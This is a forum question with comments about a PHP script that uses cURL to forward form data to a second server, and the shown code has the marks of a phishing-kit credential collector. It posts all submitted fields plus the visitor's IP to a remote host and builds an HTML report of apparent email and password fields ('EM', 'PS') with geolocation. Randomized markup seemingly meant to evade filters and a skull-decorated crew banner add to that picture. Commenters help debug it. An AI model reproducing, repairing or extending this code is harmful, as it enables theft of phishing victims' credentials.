# i used cURL to send php data from server to another but i keep getting error 500 and its not working

Tags: php, curl

i wan't to send php $message data from www.site-A.com/file.php to www.site-B.com/file2.php and save it like an html file so i used cURL to do that but its not working, this is the code from www.site-A.com/file.php

```
<?php
$status = json_decode(TEST($_POST), true);
function TEST($arra) {
    $ip = getenv("REMOTE_ADDR");
    $arra['ip'] = $ip;
    $ch = curl_init("http://site-B.com/file2.php");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, TRUE);
    curl_setopt($ch, CURLOPT_POSTFIELDS, array_merge($arra));
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $c = curl_exec($ch);
    curl_close($ch);
    return $c;
    }
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$details     = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip=" .     $ip . "");
$codecountryy      = $details->geoplugin_countryCode;
$countryname = $details->geoplugin_countryName;
$countrycode = strtolower($codecountryy);
$message = "<!DOCTYPE html><html> <head> 
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\"> 
<meta name=\"viewport\" content=\"width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;\"> 
<style type=\"text/css\">body { width: 100% !important;}</style> 
</head> 
<body class=\" ".md5(gmdate('r'))." \"  id=\"". rand(99999999999999, 9999999999999999999999999)."\"   style=\"PADDING-BOTTOM: 0px; PADDING-TOP: 40px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: #e9e9e9\"> 
<table class=\" ".md5(gmdate('r'))." \" style=\"WIDTH: 100%\"> 
  <tbody class=\" ".md5(gmdate('r'))." \"  for=\"". rand(99999999999, 999999999999999999999999)."\"  > 
    <tr class=\" ".md5(gmdate('r'))." \"> 
      <td  for=\" ".md5(gmdate('r'))." \"  style=\" BACKGROUND-COLOR: #e9e9e9\" align=\"center\"> 
        <table class=\" ".md5(gmdate('r'))." \" width=\"600\" border=\"0\"> 
          <tbody class=\" ".md5(gmdate('r'))." \"> 
            <tr> 
              <td class=\" ".md5(gmdate('r'))." \"> 
                <div class=\" ".md5(gmdate('r'))." \"> 
                  <table class=\" ".md5(gmdate('r'))." \" for=\" ".md5(gmdate('r'))." \"  cellspacing=\"0\" cellpadding=\"0\" width=\"600\" border=\"0\"> 
                    <tbody  for=\"". rand(99999999999, 999999999999999999999999)."\"  > 
                      <tr class=\" ".md5(gmdate('r'))." \"> 
                        <td class=\" ".md5(gmdate('r'))." \"  for=\"". rand(99999999999, 999999999999999999999999)."\"    style=\" BACKGROUND: #ffffff;  LINE-HEIGHT: 22px;border-radius: 10px 10px 0px 0px\"> 
                          <table cellspacing=\"0\" cellpadding=\"0\" width=\"600\" align=\"left\" border=\"0\"> 
                            <tbody> 
                              <tr> 
                                <td class=\" ".md5(gmdate('r'))." \"> 
                                  <div class=\" ".md5(gmdate('r'))." \" id=\"". rand(99999999999999, 9999999999999999999999999)."\"  align=\"center\" style=\"LINE-HEIGHT: 30px;FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR: #747474;\"> 
                                    <p> 
                                    <div class=\" ".md5(gmdate('r'))." \"  for=\" ".md5(gmdate('r'))." \"   style=\"FONT-SIZE: 10px; FONT-FAMILY: Arial black; COLOR: #828282;\" > 
                                      <p style=\"FONT-SIZE: 27px\"><strong><font color=\"#7E7E7E\"> \ ◇ ◇ ◇  <font size=\"6\">☠</font> MA DZ TN <font size=\"6\">☠</font>  ◇ ◇ ◇  / </font></strong> 
                                      </p> 
                                    </div> 
                                    </p> 
                                  </div> 
                                </td> 
                              </tr> 
                            </tbody> 
                          </table> 
                        </td> 
                      </tr> 
                    </tbody> 
                  </table> 
                </div> 
                <div> 
                <table class=\" ".md5(gmdate('r'))." \"  id=\"". rand(99999999999999, 9999999999999999999999999)."\"  cellspacing=\"0\" cellpadding=\"0\" width=\"600\" border=\"0\"> 
                  <tbody class=\" ".md5(gmdate('r'))." \"> 
                    <tr> 
                      <td class=\" ".md5(gmdate('r'))." \" style=\" BACKGROUND: #F5F5F5 ; LINE-HEIGHT: 22px;border-top:2px solid #7E7E7E\"> 
                        <table cellspacing=\"0\" cellpadding=\"0\" width=\"600\" align=\"left\" border=\"0\"> 
                          <tbody> 
                            <tr> 
                              <td> 
                                <div class=\" ".md5(gmdate('r'))." \"  for=\" ".md5(gmdate('r'))." \"  align=\"center\" style=\"width:100%;padding: 15px 0px 15px 0px;FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR: #747474;\"> 
                                <b><font color=\"#7E7E7E\"></font></b> 
                              </td> 
                            </tr> 
                            <tr class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\"   style=\" BACKGROUND: #FFFFFF; COLOR: #747474;\"> 
                              <td> 
                                <div  id=\"". rand(99999999999999, 9999999999999999999999999)."\"  align=\"center\" style=\"FONT-SIZE: 12px; font weight: bold ;width:100%;padding: 4px 0px 4px 0px\"> 
                                 " .$_POST['EM']." 
                                </div> 
                                <div class=\" ".md5(gmdate('r'))." \" for=\" ".md5(gmdate('r'))." \"  align=\"center\" style=\"FONT-SIZE: 12px; font weight: bold ;width:100%;padding: 5px 0px 4px 0px\">                          
                                 " .$_POST['PS']." 
                                </div> 
                              </td> 
                            </tr> 
                            <tr class=\" ".md5(gmdate('r'))." \"  for=\"". rand(99999999999, 999999999999999999999999)."\"   style=\" BACKGROUND: #FFFFFF; COLOR: #747474;\"> 
                              <td> 
                                <div  id=\"". rand(99999999999999, 9999999999999999999999999)."\"  align=\"center\" style=\"FONT-SIZE: 12px; font weight: bold ;width:100%;padding: 4px 0px 4px 0px\"> 
                                  " .$smiyacountry." 
                                </div> 
                              </td> 
                            </tr>                      
                          </tbody> 
                        </table> 
                      </td> 
                    </tr> 
                  </tbody> 
                </table> 
                </div> 
                <div> 
                  <table class=\" ".md5(gmdate('r'))." \"  id=\"". rand(99999999999999, 9999999999999999999999999)."\"  cellspacing=\"0\" cellpadding=\"0\" width=\"600\" border=\"0\"> 
                    <tbody class=\" ".md5(gmdate('r'))." \"> 
                      <tr> 
                        <td class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\"   style=\" BACKGROUND: #ffffff;  LINE-HEIGHT: 27px\"> 
                          <table  for=\"". rand(99999999999, 999999999999999999999999)."\"   width=\"600\" align=\"left\" border=\"0\"> 
                            <tbody class=\" ".md5(gmdate('r'))." \"> 
                              <tr> 
                                <!-- -->                               
                              </tr> 
                            </tbody> 
                          </table> 
                        </td> 
                      </tr> 
                    </tbody> 
                  </table> 
                </div> 
                <div class=\" ".md5(gmdate('r'))." \"> 
                <table class=\" ".md5(gmdate('r'))." \"  id=\"". rand(99999999999999, 9999999999999999999999999)."\"  cellspacing=\"0\" cellpadding=\"0\" width=\"600\" border=\"0\"> 
                  <tbody> 
                    <tr> 
                      <td class=\" ".md5(gmdate('r'))." \" for=\"". rand(99999999999, 999999999999999999999999)."\"    style=\" BACKGROUND: #ffffff;  LINE-HEIGHT: 22px;border-radius:0px 0px 10px 10px\"> 
                        <table class=\" ".md5(gmdate('r'))." \" cellspacing=\"0\" cellpadding=\"0\" width=\"600\" align=\"left\" border=\"0\"> 
                          <tbody> 
                            <tr class=\" ".md5(gmdate('r'))." \"> 
                              <td> 
                                <div class=\" ".md5(gmdate('r'))." \"  for=\"". rand(99999999999, 999999999999999999999999)."\"   style=\"FONT-SIZE: 9px; FONT-FAMILY: Arial; COLOR: #747474;margin-left:30px;margin-right:30px\"> 
                                  <hr size=\"2\" color=\"#F0F0F0\" width=\"100%\"> 

                              </td> 
                            </tr> 
                          </tbody> 
                        </table> 
                      </td> 
                    </tr> 
                  </tbody> 
                </table> 
                </div> 
              </td> 
            </tr> 
            <tr class=\" ".md5(gmdate('r'))." \"> 
              <td class=\" ".md5(gmdate('r'))." \"  for=\"". rand(99999999999, 999999999999999999999999)."\"   style=\" PADDING-TOP: 10px; \" align=\"center\"> 
                <div class=\" ".md5(gmdate('r'))." \" align=\"center\" style=\"FONT-SIZE: 11px; FONT-FAMILY: Arial; COLOR: #959595;\"> 

                </div> 
              </td> 
            </tr> 
          </tbody> 
        </table> 
      </td> 
    </tr> 
  </tbody> 
</table> 
</body> 
</html>";
?>
```

when i execute this php script i always get error 500.
i want to write $message data on an html file like a said before in the seconde website www.site-B.com/file2.php so i used this code :

```
$myFile = "file.html";
$fh = fopen($myFile, 'a+') or die("can't open file");
fwrite($fh, $message);
fclose($fh);
```

but this is not working, the file.html was not created and that mean there is no connection between the two servers, what did i miss ? please help me guys, Thank's.

Comment: Check webserver and php logfiles

Comment: Add these at the top of the file. 500 errors are normally code smells that your php,ini is not allowing to show up.

error_reporting(E_ALL); ini_set('display_errors', 1);

Comment: You do have to make sure that the web server b has write permission for whatever the directory it's trying to write. And Please show the complete code of file2.php. Right now $message is undefined. And your first code doesn't make sense. Why is it decoding a $_POST. I thought you are sending data from A to B.

Comment: yes $message is undefined and this is the problem , and it's decoding $_POST because i use this file to send some information to users via mail function and all what i wanted is to keep this messages in the other server . i think that i solved to problem thank you ^^